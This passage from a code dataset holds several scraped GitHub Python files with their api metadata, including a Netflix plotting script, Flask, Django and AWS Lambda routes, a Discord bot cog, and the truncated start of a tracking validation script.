"typing.Union", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 46, "usage_type": "name"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 53, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 65, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 66, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 69, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 69, "usage_type": "name"}, {"api_name": "lxml.etree.XMLSyntaxError", "line_number": 70, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 70, "usage_type": "name"}, {"api_name": "lxml.etree.XPathEvalError", "line_number": 80, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 80, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 86, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 86, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "lxml.etree.ElementBase", "line_number": 90, "usage_type": "attribute"}, {"api_name": "lxml.etree", "line_number": 90, "usage_type": "name"}]}
+{"seq_id": "20844229635", "text": "# import pandas and matplotlib\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# read the csv file to a DataFrame\nnetflix_df = pd.read_csv('netflix/netflix_data.csv')\n# print the first 5 rows to and columns' info to understand the dataframe\nprint(netflix_df[0:5])\nprint(netflix_df.info())\n# filter the dataframe for movies\nnetflix_df_moviesonly = netflix_df[netflix_df['type'] == 'Movie']\n# select columns of interest\nnetflix_movies_col_subset = netflix_df_moviesonly.iloc[:, [1, 2, 5, 10, 7, 8]]\n# for the plot, save x and y axes columns\nyears = netflix_movies_col_subset['release_year']\ndurations = netflix_movies_col_subset['duration']\n# plot the chart\nplt.scatter(years, durations)\n# label the axes\nplt.xlabel('Release Year', fontsize=14)\nplt.ylabel('Duration (min)', fontsize=14)\n# title the plot\nplt.title('Movie Duration by Year of Release', fontsize=20)\nplt.savefig('movie_average.png')\n# filter movie genres of less than 60 min play\nshort_movies = netflix_movies_col_subset[netflix_movies_col_subset['duration'] < 60]\n# print frist few rows of short_movies\nprint(f\"\\n{short_movies.head(30)}\")\n# initialize an empty list of colors\ncolors = []\n# iterate through the dateset\nfor lab, row in netflix_movies_col_subset.iterrows():\n if row['genre'] == 'Children':\n colors.append('red')\n elif row['genre'] == 'Documentaries':\n colors.append('blue')\n elif row['genre'] == 'Stand-Up':\n colors.append('green')\n else:\n colors.append('black')\n# plor the chart again\nplt.scatter(years, durations, c=colors)\n# label the axes\nplt.xlabel('Release year', fontsize=14)\nplt.ylabel('Duration (min)', fontsize=14)\nplt.title('Movie duration by year of release')\nplt.savefig('movie_average(1).png')\n# Is it certain that movies are getting shorter?\nare_movies_getting_shorter = 'maybe'\n", "repo_name": "Vickythedeveloper/datacamp_project1", "sub_path": "netflix/netflix_movies_avgdur.py", "file_name": "netflix_movies_avgdur.py", "file_ext": "py", "file_size_in_byte": 1815, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "16029678397", "text": "from paynechain.block import BlockChain\nfrom pathlib import Path\nimport pickle\n\nbc_file = Path('blockchain')\nif bc_file.is_file():\n with open('blockchain', 'rb') as bc_handle:\n bc = pickle.load(bc_handle)\nelse:\n bc = BlockChain()\n bc.make_genesis_block()\n\ndata = input(\"Add some data to le blockchain: \")\n\nbc.make_next_block(data)\n\nwith open('blockchain', 'wb') as bc_write_handle:\n pickle.dump(bc, bc_write_handle)", "repo_name": "rollinginsanity/paynechayne", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 8, "usage_type": "call"}, {"api_name": "paynechain.block.BlockChain", "line_number": 10, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "33050462491", "text": "import os\nimport genai_core.types\nimport genai_core.upload\nimport genai_core.documents\nfrom pydantic import BaseModel\nfrom aws_lambda_powertools import Logger, Tracer\nfrom aws_lambda_powertools.event_handler.api_gateway import Router\n\ntracer = Tracer()\nrouter = Router()\nlogger = Logger()\n\n\nclass FileUploadRequest(BaseModel):\n fileName: str\n\n\nclass TextDocumentRequest(BaseModel):\n title: str\n content: str\n\n\nclass QnADocumentRequest(BaseModel):\n question: str\n answer: str\n\n\nclass WebsiteDocumentRequest(BaseModel):\n sitemap: bool\n address: str\n followLinks: bool\n limit: int\n\n\nallowed_extensions = set(\n [\n \".csv\",\n \".doc\",\n \".docx\",\n \".epub\",\n \".odt\",\n \".pdf\",\n \".ppt\",\n \".pptx\",\n \".tsv\",\n \".xlsx\",\n \".eml\",\n \".html\",\n \".json\",\n \".md\",\n \".msg\",\n \".rst\",\n \".rtf\",\n \".txt\",\n \".xml\",\n ]\n)\n\n\n@router.post(\"/workspaces//documents/file-upload\")\n@tracer.capture_method\ndef file_upload(workspace_id: str):\n data: dict = router.current_event.json_body\n request = FileUploadRequest(**data)\n\n _, extension = os.path.splitext(request.fileName)\n if extension not in allowed_extensions:\n raise genai_core.types.CommonError(\"Invalid file extension\")\n\n result = genai_core.upload.generate_presigned_post(workspace_id, request.fileName)\n\n return {\"ok\": True, \"data\": result}\n\n\n@router.get(\"/workspaces//documents/\")\n@tracer.capture_method\ndef get_documents(workspace_id: str, document_type: str):\n query_string = router.current_event.query_string_parameters or {}\n last_document_id = query_string.get(\"lastDocumentId\", None)\n\n result = genai_core.documents.list_documents(\n workspace_id, document_type, last_document_id\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"items\": [_convert_document(item) for item in result[\"items\"]],\n \"lastDocumentId\": result[\"last_document_id\"],\n },\n }\n\n\n@router.post(\"/workspaces//documents/\")\n@tracer.capture_method\ndef add_document(workspace_id: str, document_type: str):\n data: dict = router.current_event.json_body\n\n if document_type == \"text\":\n request = TextDocumentRequest(**data)\n request.title = request.title.strip()[:1000]\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n title=request.title,\n content=request.content,\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n elif document_type == \"qna\":\n request = QnADocumentRequest(**data)\n request.question = request.question.strip()[:1000]\n request.answer = request.answer.strip()[:1000]\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n title=request.question,\n content=request.question,\n content_complement=request.answer,\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n elif document_type == \"website\":\n request = WebsiteDocumentRequest(**data)\n request.address = request.address.strip()[:10000]\n document_sub_type = \"sitemap\" if request.sitemap else None\n request.limit = min(max(request.limit, 1), 1000)\n\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n document_sub_type=document_sub_type,\n path=request.address,\n crawler_properties={\n \"follow_links\": request.followLinks,\n 
\"limit\": request.limit,\n },\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n\n\ndef _convert_document(document: dict):\n return {\n \"id\": document[\"document_id\"],\n \"type\": document[\"document_type\"],\n \"subType\": document[\"document_sub_type\"],\n \"status\": document[\"status\"],\n \"title\": document[\"title\"],\n \"path\": document[\"path\"],\n \"sizeInBytes\": document[\"size_in_bytes\"],\n \"vectors\": document[\"vectors\"],\n \"subDocuments\": document[\"sub_documents\"],\n \"errors\": document[\"errors\"],\n \"createdAt\": document[\"created_at\"],\n \"updatedAt\": document[\"updated_at\"],\n }\n", "repo_name": "donhbk/aws-genai-llm-chatbot", "sub_path": "lib/chatbot-api/functions/api-handler/routes/documents.py", "file_name": "documents.py", "file_ext": "py", "file_size_in_byte": 4868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aws_lambda_powertools.Tracer", "line_number": 9, "usage_type": "call"}, {"api_name": "aws_lambda_powertools.event_handler.api_gateway.Router", "line_number": 10, "usage_type": "call"}, {"api_name": "aws_lambda_powertools.Logger", "line_number": 11, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 14, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 23, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "genai_core.types.types.CommonError", "line_number": 68, "usage_type": "call"}, {"api_name": "genai_core.types.types", "line_number": 68, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 68, "usage_type": "name"}, {"api_name": "genai_core.types.upload.generate_presigned_post", "line_number": 70, "usage_type": "call"}, {"api_name": "genai_core.types.upload", "line_number": 70, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 70, "usage_type": "name"}, {"api_name": "genai_core.types.documents.list_documents", "line_number": 81, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 81, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 81, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 102, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 102, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 102, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 120, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 120, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 120, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 141, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 141, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "71398852567", "text": "# coding=utf8\n\nimport time\nimport json\nfrom datetime import datetime\nfrom flask import current_app, flash, jsonify, request\nfrom jinja2 import Markup\nfrom flask_admin import expose\nfrom flask_admin.actions import action\n# from flask_admin.form import rules\nfrom yunduo.conf import xconf\n# from yunduo.utils import parse_rate\nfrom xadmin.view.base import BaseView\n# from xadmin.base.rules import Row, Column\nfrom xadmin.utils.format import date_format, map_format\nfrom xadmin.helpers import set_current_project\nfrom xadmin.constant import STATUS_ENABLE, STATUS_DISABLE\n# from xadmin.rabbitq import get_queues\n\n# from connections import redis_conf, redis_df\n# from xspider.app import app as celery_app\n# from xspider.tasks import crawl\n\n\nclass BlockView(BaseView):\n inject_current_project = True\n can_view_details = False\n # details_modal = True\n # details_modal_template = 'admin/model/modals/project_details.html'\n\n column_list = ['name', 'project', 'owner', 'created']\n column_filters = ['name']\n\n column_labels = {\n 'name': u'名称',\n 'alias': u'别名',\n 'type': u'类型',\n 'status': u'状态',\n 'owner': u'创建者',\n\n 'created': u'新增时间',\n 'updated': u'更新时间',\n 'published': u'发布时间'\n\n }\n\n column_searchable_list = ('name', )\n column_formatters = {\n # 'name': _project_pages_index,\n # 'status': map_format({START: u'启用', PAUSE: u'暂停', STOP: u'停用'}),\n 'created': date_format,\n 'updated': date_format,\n 'published': date_format,\n }\n\n form_subdocuments = {\n 'rules': {\n 'form_subdocuments': {\n None: {\n 'form_choices': {\n 'field': [('dlcount', '下载数'), ('rule', u'规则抽取'), ('code', u'Py代码抽取')],\n 'window': [(60, '1分钟'), (300, '5分钟'), (900, '15分钟'), (1800, '30分钟'), (3600, '60分钟')],\n\n }\n }\n }\n }\n }\n\n # form_rules = ['name', 'alias']\n\n form_widget_args = {\n\n }\n\n def enable_blocked(self, obj):\n old_blocked = xconf.get_blocked(obj.project.alias)\n\n xconf.set_blocked(obj.project.alias, obj.alias, obj.to_conf())\n obj.status = STATUS_ENABLE\n obj.published = datetime.now()\n obj.save()\n self.logger.info(u'启用屏蔽检测策略 %s', obj.alias, extra={'project': obj.project.alias, 'blocked': obj.alias})\n return obj\n\n def disable_blocked(self, obj):\n xconf.del_blocked(obj.project.alias, obj.alias)\n obj.status = STATUS_DISABLE\n obj.save()\n self.logger.info(u'停用屏蔽检测策略 %s', obj.alias, extra={'project': obj.project.alias, 'blocked': obj.alias})\n return obj\n", "repo_name": "icaicai/yunduo", "sub_path": "app/xadmin/view/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 2829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xadmin.view.base.BaseView", "line_number": 25, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 51, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 52, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 53, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.get_blocked", "line_number": 77, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 77, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.set_blocked", "line_number": 79, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 79, "usage_type": "name"}, {"api_name": "xadmin.constant.STATUS_ENABLE", "line_number": 80, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": 
"call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.del_blocked", "line_number": 87, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 87, "usage_type": "name"}, {"api_name": "xadmin.constant.STATUS_DISABLE", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "30038569020", "text": "from django.contrib import admin\nfrom django.urls import path, include\nfrom django.contrib.auth import views\n\nfrom apps.story.views import frontpage, search, submit, newest, vote, story\nfrom apps.core.views import signup\n\nurlpatterns = [\n path('', frontpage, name='frontpage'),\n path('s//vote/', vote, name='vote'),\n path('s//', story, name='story'),\n path('u/', include('apps.userprofile.urls')),\n path('newest/', newest, name='newest'),\n path('search/', search, name='search'),\n path('submit/', submit, name='submit'),\n path('signup/', signup, name='signup'),\n path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),\n path('logout/', views.LogoutView.as_view(), name='logout'),\n path('admin/', admin.site.urls),\n]\n", "repo_name": "SteinOveHelset/codingnews", "sub_path": "codingnews/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "apps.story.views.frontpage", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "apps.story.views.vote", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "apps.story.views.story", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "apps.story.views.newest", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "apps.story.views.search", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.story.views.submit", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.core.views.signup", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "423855906", "text": "def read_file(file):\n if '.xml' in file:\n import xml.etree.ElementTree as ET\n tree = ET.parse(file)\n descriptions = []\n root = tree.getroot()\n xml_items = root.findall('channel/item')\n\n for item in xml_items:\n description = item.find('description')\n descriptions += description.text.split(\" \")\n return descriptions\n\n elif '.json' in file:\n import json\n import chardet\n with open(file, 'rb') as f:\n data = f.read()\n result = chardet.detect(data)\n data = data.decode(result['encoding'])\n data = json.loads(data)\n full_text = ''\n for items in data['rss']['channel']['items']:\n full_text += ' ' + items['description']\n descriptions = full_text.split(' ')\n return descriptions\n\n\ndef longer_than_x(descriptions, x):\n longer_than_list = list()\n for word in descriptions:\n if len(word) > x:\n longer_than_list.append(word)\n return longer_than_list\n\n\ndef sort_dict(longer_than_list):\n sorted_dict = {word: longer_than_list.count(word) for word in longer_than_list}\n return sorted_dict\n\n\ndef top_y_words(sorted_dict, y):\n list_of_lists = list()\n for word in sorted_dict.keys():\n list_of_lists.append([word, sorted_dict[word]])\n result = sorted(list_of_lists, key=lambda pair: pair[1], reverse=True)\n\n counter = 1\n for element in result:\n print('{}. {} - {}'.format(counter, element[0], element[1]))\n if counter == y:\n break\n counter += 1\n\n\ndef core():\n input_1 = input('Введите имя папки: ')\n input_2 = input('Введите имя файла (XML или JSON): ')\n input_3 = int(input('Минимальное число символов в словах для поиска: '))\n input_4 = int(input('Введите длину списка часто повторяющихся слов: '))\n file = str(input_1 + '/' + input_2)\n data = read_file(file)\n data_list = longer_than_x(data, input_3)\n data_dict = sort_dict(data_list)\n top_y_words(data_dict, input_4)\n\n\nif __name__ == '__main__':\n core()\n", "repo_name": "igortsallagov/py-hw-7", "sub_path": "netology-7.py", "file_name": "netology-7.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 4, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 4, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "10288995036", "text": "from flask import Blueprint, request, render_template\n\nfrom src import db\nfrom src.errands.forms import ErrandForm\nfrom src.errands.models import Errand\nfrom src.places.models import Place, Location\nfrom src.wrappers import add_new_place, add_opening_hours\n\n'''\nA Blueprint is a way to organize a group of related views and other code. \nRather than registering views and other code directly with an application, they are registered with a blueprint.\nThen the blueprint is registered with the application when it is available in the factory function.\n'''\n\nbp = Blueprint('errand', __name__)\n\n\n@bp.route('/errands/create', methods=('GET', 'POST'))\ndef errands_create():\n form = ErrandForm(request.form)\n if request.method == 'POST':\n print(f'DEBUG form={form.data}')\n\n place_name = form.place_input.data\n place = Place.query.filter_by(name=place_name).first()\n if not place:\n place, location = add_new_place(place_name)\n open_hours = add_opening_hours(location)\n\n\n errand = Errand(form.name.data, form.duration_mins.data, place.id, form.notes.data)\n db.session.add(errand)\n db.session.commit()\n\n return render_template('errand.html', form=form)\n", "repo_name": "eugene01a/trip-optimization", "sub_path": "src/errands/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Blueprint", "line_number": 15, "usage_type": "call"}, {"api_name": "src.errands.forms.ErrandForm", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "src.places.models.Place.query.filter_by", "line_number": 25, "usage_type": "call"}, {"api_name": "src.places.models.Place.query", "line_number": 25, "usage_type": "attribute"}, {"api_name": "src.places.models.Place", "line_number": 25, "usage_type": "name"}, {"api_name": "src.wrappers.add_new_place", "line_number": 27, "usage_type": "call"}, {"api_name": "src.wrappers.add_opening_hours", "line_number": 28, "usage_type": "call"}, {"api_name": "src.errands.models.Errand", "line_number": 31, "usage_type": "call"}, {"api_name": "src.db.session.add", "line_number": 32, "usage_type": "call"}, {"api_name": "src.db.session", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.db", "line_number": 32, "usage_type": "name"}, {"api_name": "src.db.session.commit", "line_number": 33, "usage_type": "call"}, {"api_name": "src.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "src.db", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "35621203939", "text": "import discord\r\nfrom discord.ext import commands\r\n\r\nclass General(commands.Cog, name=\"General Commands\"):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command(name='hello')\r\n\tasync def hello(self, ctx):\r\n\t\t\"Hello World!\"\r\n\t\tawait ctx.send('Hello World!')\r\n\r\n\t@commands.command(name='spitback')\r\n\tasync def spitback(self, ctx, arg: str):\r\n\t\t\"Responds with your text.\"\r\n\t\tawait ctx.send(arg)\r\n\r\n\t@spitback.error\r\n\tasync def spitback_error(self, ctx, error):\r\n\t\terror = getattr(error, 'original', error)\r\n\t\tif isinstance(error, commands.BadArgument):\r\n\t\t\tembed=discord.Embed(title=\"Error!\", description=\"Unknown argument type or bad argument.\", color=0xfd0000)\r\n\t\t\tembed.add_field(name=\"Proper usage:\", value=\"```{}spitback ```\".format(ctx.prefix), inline=True)\r\n\t\t\tembed.set_footer(text=\"HiggsBot - A code executing Discord bot!\")\r\n\t\tif isinstance(error, commands.MissingRequiredArgument):\r\n\t\t\tembed=discord.Embed(title=\"Error!\", description=\"Missing argument.\", color=0xfd0000)\r\n\t\t\tembed.add_field(name=\"Proper usage:\", value=\"```{}spitback ```\".format(ctx.prefix), inline=True)\r\n\t\t\tembed.set_footer(text=\"HiggsBot - A code executing Discord bot!\")\r\n\t\tawait ctx.send(embed=embed)\r\n\r\n\t@commands.command(name='readme')\r\n\tasync def readme(self,ctx):\r\n\t\t\"Print a simple readme\"\r\n\t\tf = open(\"data/general/help.txt\", \"r\")\r\n\t\tawait ctx.send(f.read())\r\n\t\tf.close()\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(General(bot))", "repo_name": "higgsbot/main", "sub_path": "cogs/general.py", "file_name": "general.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 4, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 4, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 8, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 8, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 22, "usage_type": "call"}, {"api_name": "discord.ext.commands.MissingRequiredArgument", "line_number": 25, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 25, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "11877015022", "text": "import os\nimport pathlib\nimport pickle\nimport shutil\nimport time\nfrom functools import partial\nimport json \nimport fire\nimport numpy as np\nimport torch\nfrom google.protobuf import text_format\nfrom tensorboardX import SummaryWriter\nimport torchvision\nimport torchplus\nimport second.data.kitti_common as kitti\nfrom second.builder import target_assigner_builder, voxel_builder\nfrom second.data.preprocess_tr import merge_second_batch_tr\nfrom second.data.preprocess import merge_second_batch\nfrom second.data.preprocess_tr_vid import merge_second_batch_tr_vid\nfrom second.data.preprocess_tr_vid_spatio import merge_second_batch_tr_vid_spatio\nfrom second.protos import pipeline_pb2\nfrom second.pytorch.builder import (box_coder_builder, input_reader_builder_tr, input_reader_builder_tr_vid, input_reader_builder_tr_vid_spatio,\n lr_scheduler_builder, optimizer_builder,\n second_builder,\n second_2stage_builder,\n second_endtoend_builder,\n second_endtoend_builder_tr,\n second_endtoend_builder_tr_share,\n second_endtoend_builder_tr_share_freeze,\n second_endtoend_builder_tr_share_freeze_mmmot,\n second_endtoend_builder_tr_share_freeze_mmmot_ori,\n second_endtoend_builder_spatio)\nfrom second.utils.eval import get_coco_eval_result, get_official_eval_result\nfrom second.utils.progress_bar import ProgressBar\nfrom collections import OrderedDict\n# import torch.distributed as dist\n# from apex.parallel import DistributedDataParallel as DDP\n\nimport sys\nsys.path.append('./mmMOT')\nimport argparse\nimport logging\nimport os\nimport pprint\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport yaml\nfrom easydict import EasyDict\nfrom kitti_devkit.evaluate_tracking import evaluate as evaluate_tr\nfrom tensorboardX import SummaryWriter\nfrom torch.utils.data import DataLoader\n# from models import model_entry\n# from tracking_model import TrackingModule\nfrom tracking_model_vid import TrackingModule\nfrom utils_tr.build_util import (build_augmentation, build_criterion, \n build_dataset, build_lr_scheduler, build_model,\n build_optim)\nfrom utils_tr.data_util import write_kitti_result\nfrom utils_tr.train_util import (AverageMeter, DistributedGivenIterationSampler,\n create_logger, load_state, save_checkpoint)\n\n\ndef validate(val_loader,\n net,\n step,\n config,\n result_path,\n part='train',\n fusion_list=None,\n fuse_prob=False):\n\n logger = logging.getLogger('global_logger')\n for i, (sequence) in enumerate(val_loader):\n logger.info('Test: [{}/{}]\\tSequence ID: KITTI-{}'.format(\n i, len(val_loader), sequence.name))\n seq_loader = DataLoader(\n sequence,\n batch_size=config.batch_size,\n shuffle=False,\n num_workers=config.workers,\n pin_memory=True)\n if len(seq_loader) == 0:\n net.eval_tr()\n logger.info('Empty Sequence ID: KITTI-{}, skip'.format(\n sequence.name))\n else:\n validate_seq(seq_loader, net, config)\n\n write_kitti_result(\n result_path,\n sequence.name,\n step,\n net.frames_id,\n net.frames_det,\n part=part)\n\n MOTA, MOTP, recall, prec, F1, fp, fn, id_switches = evaluate_tr(\n step, result_path, part=part)\n\n # net.train()\n return MOTA, MOTP, recall, prec, F1, fp, fn, id_switches\n\n\ndef validate_seq(val_loader,\n net,\n config,\n fusion_list=None,\n fuse_prob=False):\n batch_time = AverageMeter(0)\n\n # switch to evaluate mode\n net.eval_tr()\n\n logger = logging.getLogger('global_logger')\n end = time.time()\n\n with torch.no_grad():\n for i, (input, det_info, dets, det_split) in 
